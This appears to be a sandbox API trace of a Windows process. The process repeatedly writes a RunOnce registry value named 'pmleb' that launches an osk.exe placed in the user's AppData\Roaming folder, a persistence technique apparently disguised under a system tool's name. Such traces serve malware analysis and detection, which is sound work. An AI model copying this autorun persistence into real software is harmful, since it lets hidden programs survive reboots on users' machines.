SetTimer (hWnd=0x20280, nIDEvent=0x2281, uElapse=0xa, lpTimerFunc=0x0) returned 0x2281 [0096.056] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.070] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.070] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.071] KillTimer (hWnd=0x20280, uIDEvent=0x2281) returned 1 [0096.071] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.071] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.072] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.072] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.072] RegCloseKey (hKey=0x280) returned 0x0 [0096.072] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.072] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.072] SetTimer (hWnd=0x20280, nIDEvent=0x2282, uElapse=0xa, lpTimerFunc=0x0) returned 0x2282 [0096.073] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.086] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.086] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.086] KillTimer (hWnd=0x20280, uIDEvent=0x2282) returned 1 [0096.087] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.087] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.087] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.088] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.088] RegCloseKey (hKey=0x280) returned 0x0 [0096.088] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.088] SetTimer (hWnd=0x20280, nIDEvent=0x2283, uElapse=0xa, lpTimerFunc=0x0) returned 0x2283 [0096.088] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.102] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.102] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.102] KillTimer (hWnd=0x20280, uIDEvent=0x2283) returned 1 [0096.102] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.102] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.103] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.103] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.103] RegCloseKey (hKey=0x280) returned 0x0 [0096.103] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.103] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.103] SetTimer (hWnd=0x20280, nIDEvent=0x2284, uElapse=0xa, lpTimerFunc=0x0) returned 0x2284 [0096.104] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.117] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.117] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.117] KillTimer (hWnd=0x20280, uIDEvent=0x2284) returned 1 [0096.118] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.118] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.118] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.119] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.119] RegCloseKey (hKey=0x280) returned 0x0 [0096.119] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.119] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.119] SetTimer (hWnd=0x20280, nIDEvent=0x2285, uElapse=0xa, lpTimerFunc=0x0) returned 0x2285 [0096.119] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.133] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.133] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.133] KillTimer (hWnd=0x20280, uIDEvent=0x2285) returned 1 [0096.133] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.134] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.134] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.134] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.134] RegCloseKey (hKey=0x280) returned 0x0 [0096.134] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.135] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.135] SetTimer (hWnd=0x20280, nIDEvent=0x2286, uElapse=0xa, lpTimerFunc=0x0) returned 0x2286 [0096.135] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.148] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.148] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.149] KillTimer (hWnd=0x20280, uIDEvent=0x2286) returned 1 [0096.149] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.149] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.149] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.150] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.150] RegCloseKey (hKey=0x280) returned 0x0 [0096.150] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.150] SetTimer (hWnd=0x20280, nIDEvent=0x2287, uElapse=0xa, lpTimerFunc=0x0) returned 0x2287 [0096.150] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.164] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.164] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.164] KillTimer (hWnd=0x20280, uIDEvent=0x2287) returned 1 [0096.165] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.165] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.165] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.165] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.166] RegCloseKey (hKey=0x280) returned 0x0 [0096.166] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.166] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.166] SetTimer (hWnd=0x20280, nIDEvent=0x2288, uElapse=0xa, lpTimerFunc=0x0) returned 0x2288 [0096.166] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.180] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.180] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.180] KillTimer (hWnd=0x20280, uIDEvent=0x2288) returned 1 [0096.180] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.181] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.181] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.181] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.181] RegCloseKey (hKey=0x280) returned 0x0 [0096.182] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.182] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.182] SetTimer (hWnd=0x20280, nIDEvent=0x2289, uElapse=0xa, lpTimerFunc=0x0) returned 0x2289 [0096.182] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.195] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.195] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.195] KillTimer (hWnd=0x20280, uIDEvent=0x2289) returned 1 [0096.196] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.196] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.196] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.197] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.197] RegCloseKey (hKey=0x280) returned 0x0 [0096.197] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.197] SetTimer (hWnd=0x20280, nIDEvent=0x228a, uElapse=0xa, lpTimerFunc=0x0) returned 0x228a [0096.197] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.211] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.211] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.211] KillTimer (hWnd=0x20280, uIDEvent=0x228a) returned 1 [0096.211] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.211] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.211] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.212] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.212] RegCloseKey (hKey=0x280) returned 0x0 [0096.212] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.212] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.212] SetTimer (hWnd=0x20280, nIDEvent=0x228b, uElapse=0xa, lpTimerFunc=0x0) returned 0x228b [0096.212] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.226] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.226] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.226] KillTimer (hWnd=0x20280, uIDEvent=0x228b) returned 1 [0096.227] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.227] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.227] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.227] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.228] RegCloseKey (hKey=0x280) returned 0x0 [0096.228] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.228] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.228] SetTimer (hWnd=0x20280, nIDEvent=0x228c, uElapse=0xa, lpTimerFunc=0x0) returned 0x228c [0096.228] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.242] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.242] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.242] KillTimer (hWnd=0x20280, uIDEvent=0x228c) returned 1 [0096.242] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.242] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.243] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.243] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.243] RegCloseKey (hKey=0x280) returned 0x0 [0096.243] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.243] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.243] SetTimer (hWnd=0x20280, nIDEvent=0x228d, uElapse=0xa, lpTimerFunc=0x0) returned 0x228d [0096.243] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.257] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.257] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.258] KillTimer (hWnd=0x20280, uIDEvent=0x228d) returned 1 [0096.258] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.258] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.258] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.259] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.259] RegCloseKey (hKey=0x280) returned 0x0 [0096.259] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.259] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.259] SetTimer (hWnd=0x20280, nIDEvent=0x228e, uElapse=0xa, lpTimerFunc=0x0) returned 0x228e [0096.259] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.273] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.273] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.273] KillTimer (hWnd=0x20280, uIDEvent=0x228e) returned 1 [0096.274] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.274] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.274] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.274] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.275] RegCloseKey (hKey=0x280) returned 0x0 [0096.275] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.275] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.275] SetTimer (hWnd=0x20280, nIDEvent=0x228f, uElapse=0xa, lpTimerFunc=0x0) returned 0x228f [0096.275] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.289] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.289] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.289] KillTimer (hWnd=0x20280, uIDEvent=0x228f) returned 1 [0096.289] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.290] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.290] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.290] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.290] RegCloseKey (hKey=0x280) returned 0x0 [0096.290] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.290] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.291] SetTimer (hWnd=0x20280, nIDEvent=0x2290, uElapse=0xa, lpTimerFunc=0x0) returned 0x2290 [0096.291] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.304] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.304] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.304] KillTimer (hWnd=0x20280, uIDEvent=0x2290) returned 1 [0096.305] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.305] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.305] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.305] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.306] RegCloseKey (hKey=0x280) returned 0x0 [0096.306] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.306] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.306] SetTimer (hWnd=0x20280, nIDEvent=0x2291, uElapse=0xa, lpTimerFunc=0x0) returned 0x2291 [0096.306] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.320] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.320] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.320] KillTimer (hWnd=0x20280, uIDEvent=0x2291) returned 1 [0096.320] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.321] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.321] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.321] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.321] RegCloseKey (hKey=0x280) returned 0x0 [0096.321] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.322] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.322] SetTimer (hWnd=0x20280, nIDEvent=0x2292, uElapse=0xa, lpTimerFunc=0x0) returned 0x2292 [0096.322] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.335] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.336] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.336] KillTimer (hWnd=0x20280, uIDEvent=0x2292) returned 1 [0096.336] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.336] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.336] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.337] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.337] RegCloseKey (hKey=0x280) returned 0x0 [0096.337] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.337] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.337] SetTimer (hWnd=0x20280, nIDEvent=0x2293, uElapse=0xa, lpTimerFunc=0x0) returned 0x2293 [0096.337] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.351] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.351] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.351] KillTimer (hWnd=0x20280, uIDEvent=0x2293) returned 1 [0096.351] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.352] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.352] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, 